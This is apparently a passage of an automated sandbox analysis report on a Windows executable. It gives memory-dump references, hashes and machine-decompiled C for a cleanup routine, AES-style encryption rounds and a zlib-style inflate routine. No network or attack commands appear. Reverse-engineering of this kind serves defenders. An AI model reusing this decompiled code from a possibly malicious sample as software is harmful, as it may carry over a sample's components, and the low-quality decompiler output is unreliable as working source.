_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937

Strings

, xrefs: 0040393C

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrowmemcpy
String ID:
API String ID: 2382887404-3916222277
Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004029CC Relevance: 3.8, APIs: 3, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004029CC(void* _a4) {
				void* _t17;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t25;
				signed int _t35;
				void* _t37;

				_t37 = _a4;
				if(_t37 != 0) {
					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
						_t25 =  *((intOrPtr*)(_t37 + 4));
						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
					}
					if( *(_t37 + 8) == 0) {
						L9:
						_t18 =  *((intOrPtr*)(_t37 + 4));
						if(_t18 != 0) {
							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
						}
						return HeapFree(GetProcessHeap(), 0, _t37);
					} else {
						_t35 = 0;
						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
							L8:
							free( *(_t37 + 8));
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
							if(_t23 != 0) {
								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
							}
							_t35 = _t35 + 1;
						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
						goto L8;
					}
				}
				return _t17;
			}

0x004029ce
0x004029d6
0x004029db
0x004029df
0x004029ea
0x004029ea
0x004029ef
0x00402a1d
0x00402a1d
0x00402a22
0x00402a2e
0x00402a31
0x00000000
0x004029f1
0x004029f2
0x004029f7
0x00402a12
0x00402a15
0x00000000
0x00000000
0x00000000
0x00000000
0x004029f9
0x004029f9
0x004029fc
0x00402a01
0x00402a07
0x00402a0b
0x00402a0c
0x00402a0d
0x00000000
0x004029f9
0x004029ef
0x00402a45

APIs

free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Heap$FreeProcessfree
String ID:
API String ID: 3428986607-0
Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00402E7E Relevance: 3.3, APIs: 2, Instructions: 272
COMMONCrypto

Download Yara Rule

C-Code - Quality: 34%

			E00402E7E(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
				signed int _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				signed int _v12;
				void* _v13;
				void* _v14;
				void* _v15;
				signed int _v16;
				void* _v17;
				void* _v18;
				void* _v19;
				signed int _v20;
				void* _v21;
				void* _v22;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v44;
				signed char* _t151;
				signed char* _t154;
				signed char* _t155;
				signed char* _t158;
				signed char* _t159;
				signed char* _t160;
				signed char* _t162;
				signed int _t166;
				signed int _t167;
				signed char* _t172;
				signed int* _t245;
				signed int _t262;
				signed int _t263;
				signed int _t278;
				signed int _t279;
				signed int _t289;
				signed int _t303;
				intOrPtr _t344;
				void* _t345;
				signed int _t346;

				_t344 = __ecx;
				_v32 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v44);
					L0040776E();
				}
				_t151 = _a4;
				_t154 =  &(_t151[3]);
				_t155 =  &(_t154[1]);
				_t278 = (( *_t151 & 0x000000ff) << 0x00000018 | (_t151[1] & 0x000000ff) << 0x00000010 |  *_t154 & 0x000000ff) ^  *(_t344 + 8);
				_v20 = _t278;
				_t158 =  &(_t155[3]);
				_t159 =  &(_t158[1]);
				_t160 =  &(_t159[1]);
				_v16 = ((_t154[1] & 0x000000ff) << 0x00000018 | (_t155[1] & 0x000000ff) << 0x00000010 |  *_t158 & 0x000000ff) ^  *(_t344 + 0xc);
				_t162 =  &(_t160[2]);
				_t163 =  &(_t162[1]);
				_t262 = (( *_t159 & 0x000000ff) << 0x00000018 | ( *_t160 & 0x000000ff) << 0x00000010 |  *_t162 & 0x000000ff) ^  *(_t344 + 0x10);
				_v24 = _t262;
				_t166 =  *(_t344 + 0x410);
				_v28 = _t166;
				_v12 = ((_t162[1] & 0x000000ff) << 0x00000018 | (_t163[1] & 0x000000ff) << 0x00000010) ^  *(_t344 + 0x14);
				if(_t166 > 1) {
					_a4 = _t344 + 0x30;
					_v8 = _t166 - 1;
					do {
						_t245 =  &(_a4[8]);
						_a4 = _t245;
						_v24 =  *0x00408FFC ^  *0x00408BFC ^  *0x004093FC ^  *(0x4097fc + (_v16 & 0x000000ff) * 4) ^  *_a4;
						_v16 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_t278 & 0x000000ff) * 4) ^  *(_a4 - 4);
						_v12 =  *0x00408BFC ^  *0x004093FC ^  *0x00408FFC ^  *(0x4097fc + (_t262 & 0x000000ff) * 4) ^  *(_t245 - 0x1c);
						_t262 = _v24;
						_v24 = _t262;
						_t278 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_v12 & 0x000000ff) * 4) ^  *(_t245 - 0x28);
						_t80 =  &_v8;
						 *_t80 = _v8 - 1;
						_v20 = _t278;
					} while ( *_t80 != 0);
					_t166 = _v28;
					_t344 = _v32;
				}
				_t167 = _t166 << 5;
				_t86 = _t344 + 8; // 0x8bf9f759
				_t279 =  *(_t167 + _t86);
				_t88 = _t344 + 8; // 0x40355c
				_t345 = _t167 + _t88;
				_v8 = _t279;
				_t172 = _a8;
				 *_t172 =  *0x004089FC ^ _t279 >> 0x00000018;
				_t172[1] =  *0x004089FC ^ _t279 >> 0x00000010;
				_t97 = _t262 + 0x4089fc; // 0x6bf27b77
				_t172[2] =  *_t97 ^ _v8 >> 0x00000008;
				_t172[3] =  *((_v12 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t104 = _t345 + 4; // 0x33c12bf8
				_t289 =  *_t104;
				_v8 = _t289;
				_t172[4] =  *0x004089FC ^ _t289 >> 0x00000018;
				_t172[5] =  *0x004089FC ^ _v8 >> 0x00000010;
				_t172[6] =  *0x004089FC ^ _v8 >> 0x00000008;
				_t172[7] =  *((_v20 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t121 = _t345 + 8; // 0x6ff83c9
				_t303 =  *_t121;
				_v8 = _t303;
				_t172[8] =  *0x004089FC ^ _t303 >> 0x00000018;
				_t172[9] =  *0x004089FC ^ _v8 >> 0x00000010;
				_t172[0xa] =  *0x004089FC ^ _v8 >> 0x00000008;
				_t263 = _t262 & 0x000000ff;
				_t172[0xb] =  *((_v16 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t137 = _t345 + 0xc; // 0x41c1950f
				_t346 =  *_t137;
				_v8 = _t346;
				_t172[0xc] =  *0x004089FC ^ _t346 >> 0x00000018;
				_t172[0xd] =  *0x004089FC ^ _t346 >> 0x00000010;
				_t172[0xe] =  *0x004089FC ^ _t346 >> 0x00000008;
				_t148 = _t263 + 0x4089fc; // 0x6bf27b77
				_t172[0xf] =  *_t148 ^ _v8;
				return _t172;
			}

0x00402e85
0x00402e87
0x00402e8e
0x00402e98
0x00402ea1
0x00402ea6
0x00402ea7
0x00402ea7
0x00402eac
0x00402eca
0x00402ed4
0x00402ed5
0x00402ee0
0x00402eef
0x00402ef5
0x00402eff
0x00402f00
0x00402f11
0x00402f17
0x00402f18
0x00402f26
0x00402f36
0x00402f3e
0x00402f4c
0x00402f4f
0x00402f59
0x00402f5c
0x00402f5f
0x00402fbf
0x00402fcc
0x00402fd6
0x00403016
0x00403031
0x0040303b
0x0040303e
0x00403041
0x00403044
0x00403044
0x00403047
0x00403047
0x00403050
0x00403053
0x00403053
0x00403056
0x00403059
0x00403059
0x0040305d
0x0040305d
0x00403068
0x00403078
0x0040307b
0x0040308f
0x0040309a
0x004030a4
0x004030b8
0x004030bb
0x004030bb
0x004030c4
0x004030d1
0x004030e5
0x004030fa
0x0040310e
0x00403111
0x00403111
0x0040311a
0x00403127
0x0040313b
0x0040314e
0x00403154
0x00403162
0x00403165
0x00403165
0x0040316f
0x0040317f
0x00403194
0x004031a8
0x004031ab
0x004031b5
0x004031b9

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402E98
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402EA7

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
Instruction ID: 7c46eb61736c4a52f21da4615b0110659747632e7974af7727d2e67ead4b8ec0
Opcode Fuzzy Hash: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
Instruction Fuzzy Hash: 01B1AD75A081D99EDB05CFB989A04EAFFF2AF4E20474ED1E9C5C4AB313C5306505DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004031BC Relevance: 3.3, APIs: 2, Instructions: 271
COMMONCrypto

Download Yara Rule

C-Code - Quality: 33%

			E004031BC(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
				signed int _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				signed int _v12;
				void* _v13;
				void* _v14;
				void* _v15;
				signed int _v16;
				void* _v17;
				void* _v18;
				void* _v19;
				signed int _v20;
				void* _v21;
				void* _v22;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v48;
				signed char* _t154;
				signed char* _t157;
				signed char* _t158;
				signed char* _t161;
				signed char* _t162;
				signed char* _t165;
				signed int _t169;
				signed int _t170;
				signed char* _t175;
				signed int _t243;
				signed int _t278;
				signed int _t288;
				signed int _t302;
				signed int* _t328;
				signed int _t332;
				signed int* _t342;
				intOrPtr _t343;
				void* _t344;
				signed int _t345;

				_t343 = __ecx;
				_v32 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v48);
					L0040776E();
				}
				_t154 = _a4;
				_t157 =  &(_t154[3]);
				_t158 =  &(_t157[1]);
				_t243 = (( *_t154 & 0x000000ff) << 0x00000018 | (_t154[1] & 0x000000ff) << 0x00000010 |  *_t157 & 0x000000ff) ^  *(_t343 + 0x1e8);
				_v24 = _t243;
				_t161 =  &(_t158[3]);
				_t162 =  &(_t161[1]);
				_v20 = ((_t157[1] & 0x000000ff) << 0x00000018 | (_t158[1] & 0x000000ff) << 0x00000010 |  *_t161 & 0x000000ff) ^  *(_t343 + 0x1ec);
				_t165 =  &(_t162[3]);
				_t166 =  &(_t165[1]);
				_v16 = (( *_t162 & 0x000000ff) << 0x00000018 | (_t162[1] & 0x000000ff) << 0x00000010 |  *_t165 & 0x000000ff) ^  *(_t343 + 0x1f0);
				_t169 =  *(_t343 + 0x410);
				_v36 = _t169;
				_v12 = ((_t165[1] & 0x000000ff) << 0x00000018 | (_t166[1] & 0x000000ff) << 0x00000010) ^  *(_t343 + 0x1f4);
				if(_t169 > 1) {
					_t328 = _t343 + 0x210;
					_a4 = _t328;
					_v8 = _t169 - 1;
					do {
						_t332 =  *0x00409BFC ^  *0x00409FFC;
						_v28 = _t332;
						_v28 = _t332 ^  *0x0040A3FC ^  *(0x40a7fc + (_t243 & 0x000000ff) * 4) ^ _a4[1];
						_v16 =  *0x00409BFC ^  *0x00409FFC ^  *0x0040A3FC ^  *(0x40a7fc + (_v12 & 0x000000ff) * 4) ^  *_t328;
						_v12 = _v28;
						_v20 =  *0x0040A3FC ^  *0x00409BFC ^  *0x00409FFC ^  *(0x40a7fc + (_v16 & 0x000000ff) * 4) ^  *(_t328 - 4);
						_t342 = _a4;
						_t243 =  *0x00409FFC ^  *0x0040A3FC ^  *0x00409BFC ^  *(0x40a7fc + (_v20 & 0x000000ff) * 4) ^  *(_t342 - 8);
						_t328 = _t342 + 0x20;
						_t82 =  &_v8;
						 *_t82 = _v8 - 1;
						_a4 = _t328;
						_v24 = _t243;
					} while ( *_t82 != 0);
					_t343 = _v32;
					_t169 = _v36;
				}
				_t170 = _t169 << 5;
				_t278 =  *(_t343 + 0x1e8 + _t170);
				_t344 = _t343 + 0x1e8 + _t170;
				_v8 = _t278;
				_t175 = _a8;
				 *_t175 =  *0x00408AFC ^ _t278 >> 0x00000018;
				_t175[1] =  *0x00408AFC ^ _t278 >> 0x00000010;
				_t175[2] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[3] =  *((_v20 & 0x000000ff) + 0x408afc) ^ _v8;
				_t288 =  *(_t344 + 4);
				_v8 = _t288;
				_t175[4] =  *0x00408AFC ^ _t288 >> 0x00000018;
				_t175[5] =  *0x00408AFC ^ _v8 >> 0x00000010;
				_t175[6] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[7] =  *((_v16 & 0x000000ff) + 0x408afc) ^ _v8;
				_t302 =  *(_t344 + 8);
				_v8 = _t302;
				_t175[8] =  *0x00408AFC ^ _t302 >> 0x00000018;
				_t175[9] =  *0x00408AFC ^ _v8 >> 0x00000010;
				_t175[0xa] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[0xb] =  *((_v12 & 0x000000ff) + 0x408afc) ^ _v8;
				_t345 =  *(_t344 + 0xc);
				_v8 = _t345;
				_t175[0xc] =  *0x00408AFC ^ _t345 >> 0x00000018;
				_t175[0xd] =  *0x00408AFC ^ _t345 >> 0x00000010;
				_t175[0xe] =  *0x00408AFC ^ _t345 >> 0x00000008;
				_t175[0xf] =  *((_t243 & 0x000000ff) + 0x408afc) ^ _v8;
				return _t175;
			}

0x004031c3
0x004031c5
0x004031cc
0x004031d6
0x004031df
0x004031e4
0x004031e5
0x004031e5
0x004031ea
0x00403206
0x00403210
0x00403211
0x0040321f
0x0040322e
0x00403234
0x0040323f
0x00403255
0x0040325b
0x00403266
0x0040327d
0x00403285
0x00403296
0x00403299
0x0040329f
0x004032a6
0x004032a9
0x004032ac
0x00403323
0x0040332f
0x0040334b
0x0040335a
0x0040336c
0x0040337b
0x00403385
0x00403388
0x0040338b
0x0040338e
0x0040338e
0x00403391
0x00403394
0x00403394
0x0040339d
0x004033a0
0x004033a0
0x004033a3
0x004033a6
0x004033ad
0x004033bb
0x004033cb
0x004033ce
0x004033e5
0x004033f8
0x0040340c
0x0040340f
0x00403418
0x00403425
0x00403439
0x0040344e
0x00403462
0x00403465
0x0040346e
0x0040347b
0x0040348f
0x004034a1
0x004034b5
0x004034b8
0x004034c2
0x004034d2
0x004034e7
0x004034fb
0x00403508
0x0040350c

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031D6
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031E5

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
Instruction ID: bcf4991698fce177fafabfcfbf4d003d7da0a1e91b0dfae35dbc96c431f9713a
Opcode Fuzzy Hash: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
Instruction Fuzzy Hash: 43B1A135A081D99EDB05CFB984A04EAFFF2AF8E200B4ED1E6C9D4AB713C5705615DB84

Uniqueness

Uniqueness Score: -1.00%

Function 004043B7 Relevance: 1.9, APIs: 1, Instructions: 682
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E004043B7() {
				void* __ebx;
				void** __edi;
				void* __esi;
				signed int _t426;
				signed int _t427;
				void* _t434;
				signed int _t436;
				unsigned int _t438;
				void* _t442;
				void* _t448;
				void* _t455;
				signed int _t456;
				signed int _t461;
				signed char* _t476;
				signed int _t482;
				signed int _t485;
				signed int* _t488;
				void* _t490;
				void* _t492;
				void* _t493;

				_t490 = _t492;
				_t493 = _t492 - 0x2c;
				_t488 =  *(_t490 + 8);
				_t485 =  *(_t490 + 0xc);
				_t482 = _t488[0xd];
				_t476 =  *_t485;
				 *(_t490 - 4) =  *(_t485 + 4);
				 *(_t490 + 8) = _t488[8];
				 *(_t490 + 0xc) = _t488[7];
				_t426 = _t488[0xc];
				 *(_t490 - 8) = _t482;
				if(_t482 >= _t426) {
					_t479 = _t488[0xb] - _t482;
					__eflags = _t479;
				} else {
					_t479 = _t426 - _t482 - 1;
				}
				_t427 =  *_t488;
				 *(_t490 - 0x10) = _t479;
				if(_t427 > 9) {
					L99:
					_push(0xfffffffe);
					_t488[8] =  *(_t490 + 8);
					_t488[7] =  *(_t490 + 0xc);
					 *(_t485 + 4) =  *(_t490 - 4);
					 *_t485 = _t476;
					_t320 = _t485 + 8;
					 *_t320 =  *(_t485 + 8) + _t476 -  *_t485;
					__eflags =  *_t320;
					_t488[0xd] =  *(_t490 - 8);
					goto L100;
				} else {
					while(1) {
						switch( *((intOrPtr*)(_t427 * 4 +  &M00404BBD))) {
							case 0:
								goto L7;
							case 1:
								goto L20;
							case 2:
								goto L27;
							case 3:
								goto L50;
							case 4:
								goto L58;
							case 5:
								goto L68;
							case 6:
								goto L92;
							case 7:
								goto L118;
							case 8:
								goto L122;
							case 9:
								goto L104;
						}
						L92:
						__eax =  *(__ebp + 8);
						 *(__esi + 0x20) =  *(__ebp + 8);
						__eax =  *(__ebp + 0xc);
						 *(__esi + 0x1c) =  *(__ebp + 0xc);
						__eax =  *(__ebp - 4);
						__edi[1] =  *(__ebp - 4);
						__ebx = __ebx -  *__edi;
						 *__edi = __ebx;
						__edi[2] = __edi[2] + __ebx -  *__edi;
						__eax =  *(__ebp - 8);
						 *(__esi + 0x34) =  *(__ebp - 8);
						__eax = E00403CFC(__esi, __edi,  *(__ebp + 0x10));
						__eflags = __eax - 1;
						if(__eax != 1) {
							L120:
							_push(__eax);
							L100:
							_push(_t485);
							_push(_t488);
							_t434 = E00403BD6(_t479);
							L101:
							return _t434;
						}
						 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
						E004042AF( *(__esi + 4), __edi) = __edi[1];
						__ebx =  *__edi;
						 *(__ebp - 4) = __edi[1];
						__eax =  *(__esi + 0x20);
						_pop(__ecx);
						 *(__ebp + 8) =  *(__esi + 0x20);
						__eax =  *(__esi + 0x1c);
						_pop(__ecx);
						__ecx =  *(__esi + 0x34);
						 *(__ebp + 0xc) =  *(__esi + 0x1c);
						__eax =  *(__esi + 0x30);
						 *(__ebp - 8) = __ecx;
						__eflags = __ecx - __eax;
						if(__ecx >= __eax) {
							__eax =  *(__esi + 0x2c);
							__eax =  *(__esi + 0x2c) -  *(__ebp - 8);
							__eflags = __eax;
						} else {
							__eax = __eax - __ecx;
							__eax = __eax - 1;
						}
						__eflags =  *(__esi + 0x18);
						 *(__ebp - 0x10) = __eax;
						if( *(__esi + 0x18) != 0) {
							 *__esi = 7;
							goto L118;
						} else {
							 *__esi =  *__esi & 0x00000000;
							__eflags =  *__esi;
							L98:
							_t427 =  *_t488;
							__eflags = _t427 - 9;
							if(_t427 <= 9) {
								_t479 =  *(_t490 - 0x10);
								continue;
							}
							goto L99;
						}
						while(1) {
							L68:
							__eax =  *(__esi + 4);
							__ecx =  *(__esi + 8);
							__edx = __eax;
							__eax = __eax & 0x0000001f;
							__edx = __edx >> 5;
							__edx = __edx & 0x0000001f;
							_t187 = __eax + 0x102; // 0x102
							__eax = __edx + _t187;
							__eflags = __ecx - __edx + _t187;
							if(__ecx >= __edx + _t187) {
								break;
							}
							__eax =  *(__esi + 0x10);
							while(1) {
								__eflags =  *(__ebp + 0xc) - __eax;
								if( *(__ebp + 0xc) >= __eax) {
									break;
								}
								__eflags =  *(__ebp - 4);
								if( *(__ebp - 4) == 0) {
									L107:
									_t488[8] =  *(_t490 + 8);
									_t488[7] =  *(_t490 + 0xc);
									_t349 = _t485 + 4;
									 *_t349 =  *(_t485 + 4) & 0x00000000;
									__eflags =  *_t349;
									L108:
									_push( *(_t490 + 0x10));
									 *_t485 = _t476;
									 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
									_t488[0xd] =  *(_t490 - 8);
									goto L100;
								}
								__edx =  *__ebx & 0x000000ff;
								__ecx =  *(__ebp + 0xc);
								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
								 *(__ebp - 4) =  *(__ebp - 4) - 1;
								__edx = ( *__ebx & 0x000000ff) << __cl;
								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
								__ebx = __ebx + 1;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
							}
							__eax =  *(0x40bca8 + __eax * 4);
							__ecx =  *(__esi + 0x14);
							__eax = __eax &  *(__ebp + 8);
							__edx =  *(__ecx + 4 + __eax * 8);
							__eax = __ecx + __eax * 8;
							__eflags = __edx - 0x10;
							 *(__ebp - 0x14) = __edx;
							__ecx =  *(__eax + 1) & 0x000000ff;
							 *(__ebp - 0xc) = __ecx;
							if(__edx >= 0x10) {
								__eflags = __edx - 0x12;
								if(__edx != 0x12) {
									_t222 = __edx - 0xe; // -14
									__eax = _t222;
								} else {
									__eax = 7;
								}
								__ecx = 0;
								__eflags = __edx - 0x12;
								0 | __eflags != 0x00000000 = (__eflags != 0) - 1;
								__ecx = (__eflags != 0x00000000) - 0x00000001 & 0x00000008;
								__ecx = ((__eflags != 0x00000000) - 0x00000001 & 0x00000008) + 3;
								__eflags = __ecx;
								 *(__ebp - 0x10) = __ecx;
								while(1) {
									__ecx =  *(__ebp - 0xc);
									__edx = __eax + __ecx;
									__eflags =  *(__ebp + 0xc) - __eax + __ecx;
									if( *(__ebp + 0xc) >= __eax + __ecx) {
										break;
									}
									__eflags =  *(__ebp - 4);
									if( *(__ebp - 4) == 0) {
										goto L107;
									}
									__edx =  *__ebx & 0x000000ff;
									__ecx =  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
									 *(__ebp - 4) =  *(__ebp - 4) - 1;
									__edx = ( *__ebx & 0x000000ff) << __cl;
									 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
									__ebx = __ebx + 1;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
								}
								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
								 *(0x40bca8 + __eax * 4) =  *(0x40bca8 + __eax * 4) &  *(__ebp + 8);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) + ( *(0x40bca8 + __eax * 4) &  *(__ebp + 8));
								__ecx = __eax;
								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
								__ecx =  *(__ebp - 0xc);
								__eax = __eax +  *(__ebp - 0xc);
								__ecx =  *(__esi + 8);
								 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
								__eax =  *(__esi + 4);
								__edx = __eax;
								__eax = __eax & 0x0000001f;
								__edx = __edx >> 5;
								__edx = __edx & 0x0000001f;
								_t254 = __eax + 0x102; // 0x102
								__eax = __edx + _t254;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) + __ecx;
								__eflags =  *(__ebp - 0x10) + __ecx - __eax;
								if( *(__ebp - 0x10) + __ecx > __eax) {
									L111:
									__edi[9](__edi[0xa],  *(__esi + 0xc)) =  *(__ebp + 8);
									 *__esi = 9;
									__edi[6] = "invalid bit length repeat";
									 *(__esi + 0x20) =  *(__ebp + 8);
									__eax =  *(__ebp + 0xc);
									 *(__esi + 0x1c) =  *(__ebp + 0xc);
									__eax =  *(__ebp - 4);
									__edi[1] =  *(__ebp - 4);
									__ebx = __ebx -  *__edi;
									 *__edi = __ebx;
									__edi[2] = __edi[2] + __ebx -  *__edi;
									__eax =  *(__ebp - 8);
									 *(__esi + 0x34) =  *(__ebp - 8);
									__eax = E00403BD6(__ecx, __esi, __edi, 0xfffffffd);
									goto L101;
								}
								__eflags =  *(__ebp - 0x14) - 0x10;
								if( *(__ebp - 0x14) != 0x10) {
									__eax = 0;
									__eflags = 0;
									do {
										L87:
										__edx =  *(__esi + 0xc);
										 *( *(__esi + 0xc) + __ecx * 4) = __eax;
										__ecx = __ecx + 1;
										_t264 = __ebp - 0x10;
										 *_t264 =  *(__ebp - 0x10) - 1;
										__eflags =  *_t264;
									} while ( *_t264 != 0);
									 *(__esi + 8) = __ecx;
									continue;
								}
								__eflags = __ecx - 1;
								if(__ecx < 1) {
									goto L111;
								}
								__eax =  *(__esi + 0xc);
								__eax =  *( *(__esi + 0xc) + __ecx * 4 - 4);
								goto L87;
							}
							 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
							__eax = __ecx;
							__ecx =  *(__esi + 0xc);
							 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
							__eax =  *(__esi + 8);
							 *( *(__esi + 0xc) +  *(__esi + 8) * 4) = __edx;
							 *(__esi + 8) =  *(__esi + 8) + 1;
						}
						__ecx = __ebp - 0x28;
						__eax =  *(__esi + 4);
						 *(__esi + 0x14) =  *(__esi + 0x14) & 0x00000000;
						 *(__ebp - 0x14) = 9;
						__ebp - 0x2c = __ebp - 0x10;
						__ecx = __ebp - 0x14;
						__ecx = __eax;
						__eax = __eax & 0x0000001f;
						__ecx = __ecx >> 5;
						__ecx = __ecx & 0x0000001f;
						__eax = __eax + 0x101;
						__ecx = __ecx + 1;
						 *(__ebp - 0x10) = 6;
						__eax = E0040501F(__eax, __ecx,  *(__esi + 0xc), __ebp - 0x14, __ebp - 0x10, __ebp - 0x2c, __ebp - 0x28,  *((intOrPtr*)(__esi + 0x24)), __edi);
						 *(__ebp - 0xc) = __eax;
						__eflags = __eax;
						if(__eax != 0) {
							__eflags =  *(__ebp - 0xc) - 0xfffffffd;
							L113:
							if(__eflags == 0) {
								__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
								_pop(__ecx);
								 *__esi = 9;
								_pop(__ecx);
							}
							__eax =  *(__ebp + 8);
							_push( *(__ebp - 0xc));
							 *(__esi + 0x20) =  *(__ebp + 8);
							__eax =  *(__ebp + 0xc);
